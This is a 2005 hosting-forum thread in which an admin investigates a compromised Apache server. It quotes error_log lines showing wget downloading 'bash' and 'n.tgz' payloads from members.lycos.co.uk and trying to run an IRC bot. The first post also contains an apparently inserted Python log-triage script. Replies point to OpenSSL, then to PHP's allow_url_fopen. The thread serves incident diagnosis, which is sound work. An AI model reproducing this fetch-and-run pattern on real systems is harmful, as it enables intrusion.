
Attacks against Apache in error_log

Discussion in 'EasyApache' started by carock, Aug 22, 2005.

  1. carock

    carock Well-Known Member

    Joined:
    Sep 25, 2002
    Messages:
    254
    Likes Received:
    5
    Trophy Points:
    168
    Location:
    St. Charles, MO
    I'm trying to figure out how my box is being attacked. I'm looking at the Apache error_log and I find entries like this every once in a while...

    [Mon Aug 22 08:11:18 2005] [error] [client 168.209.98.35] File does not exist: /home/amiga84/public_html/images/form.5B4jpg
    [Mon Aug 22 08:11:18 2005] [error] [client 168.209.98.35] File does not exist: /home/amiga84/public_html/404.shtml
    --08:11:31-- http://wget/
    => `index.html'
    Resolving wget... failed: Host not found.
    --08:11:31-- http://members.lycos.co.uk/icetriton/bash
    => `bash'
    Resolving members.lycos.co.uk... done.
    Connecting to members.lycos.co.uk[212.78.204.20]:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 18,649 [text/plain]

    0K .......... ........ 100% 56.38 KB/s

    08:11:32 (56.38 KB/s) - `bash' saved [18649/18649]


    FINISHED --08:11:32--
    Downloaded: 18,649 bytes in 1 files
    sh: line 1: ./bash: Permission denied
    sh: line 1: cd: /var/spool/samba: No such file or directory
    sh: line 1: lwget: command not found
    tar (child): n.tgz: Cannot open: No such file or directory
    tar (child): Error is not recoverable: exiting now
    tar: Child returned status 2
    tar: Error exit delayed from previous errors
    sh: line 1: cd: bot: No such file or directory
    [Mon Aug 22 08:20:01 2005] [error] [client 132.22.254.237] File does not exist: /home/cruize/public_html/cancun-vacation-deals/404.shtml
    [Mon Aug 22 08:20:15 2005] [error] [client 132.22.254.237] File does not exist: /home/cruize/public_html/cancun-vacation-deals/images/rollovers/sun$
    [Mon Aug 22 08:20:15 2005] [error] [client 132.22.254.237] File does not exist: /home/cruize/public_html/cancun-vacation-deals/404.shtml
    [Mon Aug 22 08:20:22 2005] [error] [client 65.54.188.137] File does not exist: /home/amig/public_html/news/1999/0425-amiga.shtml
    [Mon Aug 22 08:20:22 2005] [error] [client 65.54.188.137] File does not exist: /home/amig/public_html/404.shtml
    --08:22:01-- http://members.lycos.co.uk/icetriton/n.tgz
    => `n.tgz'
    Resolving members.lycos.co.uk... done.
    Connecting to members.lycos.co.uk[212.78.204.20]:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 217,288 [text/plain]

    0K .......... .......... .......... .......... .......... 23% 80.65 KB/s
    50K .......... .......... .......... .......... .......... 47% 318.47 KB/s
    100K .......... .......... .......... .......... .......... 70% 314.47 KB/s
    150K .......... .......... .......... .......... .......... 94% 337.84 KB/s
    200K .......... .. 100% 1.70 MB/s

    08:22:03 (194.50 KB/s) - `n.tgz' saved [217288/217288]

    sh: line 1: ./bash: Permission denied
    -----------------------------------------------------------
    and so on.

    The weird thing is all the regular log entries in the middle. There's no request or source IPs logged, so I don't know where to go to find out how this person is getting files to upload on the server.

    Anyone deal with this before? I have Apache 1.3.33 and WHM 10.1.0 cPanel 10.2.0-S83 on RedHat 9

    Thanks,
    Chuck
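    The excerpt above mixes ordinary Apache entries with wget, sh and tar output that Apache itself never writes; that foreign output is stderr from a process spawned under the web server, which is why it carries no client IP. The following script, an added example and not the poster's code, separates the two kinds of lines and attaches each stray line to the nearest preceding [client] entry as a lead for which request may have triggered it. The sample log is constructed from the excerpt in the post; the line-matching patterns are my own assumptions about what downloader and shell output looks like.

```python
import re

# Constructed sample modelled on the excerpt in the post: Apache-format lines
# plus the stray wget/sh/tar output the poster asked about.
SAMPLE_LOG = """\
[Mon Aug 22 08:11:18 2005] [error] [client 168.209.98.35] File does not exist: /home/amiga84/public_html/404.shtml
--08:11:31-- http://members.lycos.co.uk/icetriton/bash
Resolving members.lycos.co.uk... done.
sh: line 1: ./bash: Permission denied
sh: line 1: cd: /var/spool/samba: No such file or directory
tar (child): n.tgz: Cannot open: No such file or directory
[Mon Aug 22 08:20:01 2005] [error] [client 132.22.254.237] File does not exist: /home/cruize/public_html/404.shtml
"""

# Apache 1.3 error_log format: [timestamp] [level] [client IP] message
APACHE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] \[client (?P<ip>[\d.]+)\] (?P<msg>.*)$")
# Assumed fingerprints of wget/sh/tar stderr, which should never appear in error_log.
FOREIGN_RE = re.compile(
    r"^(--\d\d:\d\d:\d\d--|Resolving |Connecting to |sh: line \d+:|tar( \(child\))?:)")

def find_foreign_output(text):
    """Return (stray_line, preceding_apache_entry) pairs.
    The preceding entry is only a heuristic lead: error_log is shared by every
    vhost and by CGI/PHP stderr, so the last [client] line before stray output
    is the nearest request that *may* have spawned the shell, not proof."""
    last = None
    hits = []
    for line in text.splitlines():
        m = APACHE_RE.match(line)
        if m:
            last = m.groupdict()
            continue
        if FOREIGN_RE.match(line):
            hits.append((line, last))
    return hits

def summarize(text):
    """Group stray lines by (suspected client IP, account home dir) for triage."""
    groups = {}
    for line, ctx in find_foreign_output(text):
        if ctx:
            home = ctx["msg"].split("/public_html")[0].rsplit(" ", 1)[-1]
            key = (ctx["ip"], home)
        else:
            key = ("unknown", "unknown")
        groups.setdefault(key, []).append(line)
    return groups

if __name__ == "__main__":
    for (ip, home), lines in summarize(SAMPLE_LOG).items():
        print(f"{ip} -> {home}: {len(lines)} stray line(s)")
        for stray in lines:
            print("   ", stray)
```

    Run against the real error_log, the grouped IP and account give a starting point for checking that account's access_log around the same timestamp, which is where the request itself would be recorded.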
     
  2. romanh

    romanh Member

    Joined:
    Feb 27, 2004
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    151
    I have the same errors right now

    I have the same errors right now.
    I found that it is an issue of OpenSSL.
    For the attacker it is possible to gain a shell.
    The attacker usually saves the file to the /tmp or /var/tmp directory.
    He usually runs some 'bot' scripts for IRC, DCC, ...

    I have CentOS 3 and I'm going to reinstall my box to Fedora Core 4.
    CentOS does not provide the OpenSSL updates.
    Also I think it will be the same with Fedora 4, but I'll try to build OpenSSL from source
    so later I can easily patch it.

    Roman
     
  3. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    4
    Trophy Points:
    193
    Location:
    Minneapolis, MN
    What did you do to secure your server? Do you have a system-based firewall including Mod Security, Mod Evasive, APF and BFD? Are they configured properly and do they have a very good set of rules?

    Do you see any unusual server load?
     
  4. romanh

    romanh Member

    Joined:
    Feb 27, 2004
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    151
    I have just APF

    I have just APF installed.
    These are the versions on my box:

    Apache 1.3.34

    OpenSSL 0.9.7a

    PHP 4.4.2
     
  5. romanh

    romanh Member

    Joined:
    Feb 27, 2004
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    151
    Found a solution

    It is a quite well-known bug in PHP.
    To solve this I had to set allow_url_fopen = Off in php.ini.
     